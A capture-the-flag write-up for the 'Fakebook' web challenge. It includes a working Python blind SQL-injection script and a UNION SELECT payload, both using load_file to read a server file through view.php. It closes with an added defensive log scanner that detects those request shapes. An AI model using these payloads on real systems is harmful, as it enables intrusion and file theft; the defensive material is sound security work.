Challenge practice log: [Wangding Cup] Fakebook

Challenge reproduction link: https://buuoj.cn/challenges
Reference link: Write-up for a Wangding Cup web challenge (fakebook)

I. Knowledge points involved

1. Sensitive file disclosure

robots.txt reveals the address of the source code backup.

2. SQL injection

Ordinary injection; nothing more to say.

II. Solution approach

This challenge is relatively simple. I solved it with an unintended solution: the challenge does not filter load_file, so the data can be extracted directly at the blind injection point. Here is the script:

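import requests

# Challenge instance on BUUOJ; 'no' is the injectable parameter of view.php
url = 'http://6b666407-dc94-41fa-9666-7d5d977b469d.node1.buuoj.cn/view.php?no='
result = ''

# MySQL substr() positions are 1-based, so start at 1 (position 0 yields an empty string)
for x in range(1, 100):
    # Binary search over the printable ASCII range for the character at position x
    high = 127
    low = 32
    mid = (low + high) // 2
    while high > low:
        payload = "if(ascii(substr((load_file('/var/www/html/flag.php')),%d,1))>%d,1,0)" % (x, mid)
        response = requests.get(url + payload)
        # 'www.123.com' in the response is used as the marker for the true branch
        if 'www.123.com' in response.text:
            low = mid + 1
        else:
            high = mid
        mid = (low + high) // 2

    result += chr(int(mid))
    print(result)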

As for the intended solution, I only learned from reading a write-up that there is a source code disclosure, and that the final step uses deserialization and SSRF with the file protocol to read the file...
Silly of me. Come to think of it, directly accessing /view.php?no=0+unIon/**/select+1,load_file('/var/www/html/flag.php'),1,1 gets the flag.
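
From the defender's side, both request shapes used above are easy to spot in access logs once inline SQL comments are stripped. The following is an added example, not part of the original post: the log lines are constructed, and the rule names and the functions normalise, classify and scan are hypothetical.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log entries (client IP, request path); not real traffic.
SAMPLE_LOG = [
    ("10.0.0.5", "/view.php?no=1"),
    ("10.0.0.7", "/view.php?no=0+unIon/**/select+1,load_file('/var/www/html/flag.php'),1,1"),
    ("10.0.0.9", "/view.php?no=if(ascii(substr((load_file('/var/www/html/flag.php')),1,1))>79,1,0)"),
    ("10.0.0.9", "/view.php?no=if(ascii(substr((load_file('/var/www/html/flag.php')),1,1))>103,1,0)"),
    ("10.0.0.9", "/view.php?no=if(ascii(substr((load_file('/var/www/html/flag.php')),2,1))>79,1,0)"),
    ("10.0.0.5", "/view.php?no=2"),
]

# Hypothetical rule set, matched against the normalised parameter value.
RULES = {
    "file_read": re.compile(r"\bload_file\s*\("),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "blind_probe": re.compile(r"\bascii\s*\(\s*substr(ing)?\s*\("),
}

def normalise(value):
    """Lower-case and replace inline SQL comments with a space, so that
    'unIon/**/select' is matched as 'union select'."""
    return re.sub(r"/\*.*?\*/", " ", value.lower())

def classify(path):
    """Return the set of rule names hit by the 'no' parameter of view.php."""
    parts = urlsplit(path)
    if not parts.path.endswith("/view.php"):
        return set()
    hits = set()
    for raw in parse_qs(parts.query).get("no", []):  # parse_qs decodes %xx and '+'
        if raw.isdigit():
            continue  # a plain integer is the only legitimate shape
        hits.add("non_numeric")
        text = normalise(raw)
        hits |= {name for name, rx in RULES.items() if rx.search(text)}
    return hits

def scan(log, burst=3):
    """Return (alerts, noisy_clients): per-request hits, plus clients with at
    least `burst` blind probes (character-by-character extraction)."""
    alerts = [(ip, path, classify(path)) for ip, path in log]
    alerts = [a for a in alerts if a[2]]
    probes = Counter(ip for ip, _, hits in alerts if "blind_probe" in hits)
    return alerts, sorted(ip for ip, n in probes.items() if n >= burst)
```

The non_numeric rule alone catches every request shown on this page, which is also why casting no to an integer on the server side removes the injection point entirely.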

Source: www.cnblogs.com/20175211lyz/p/11469695.html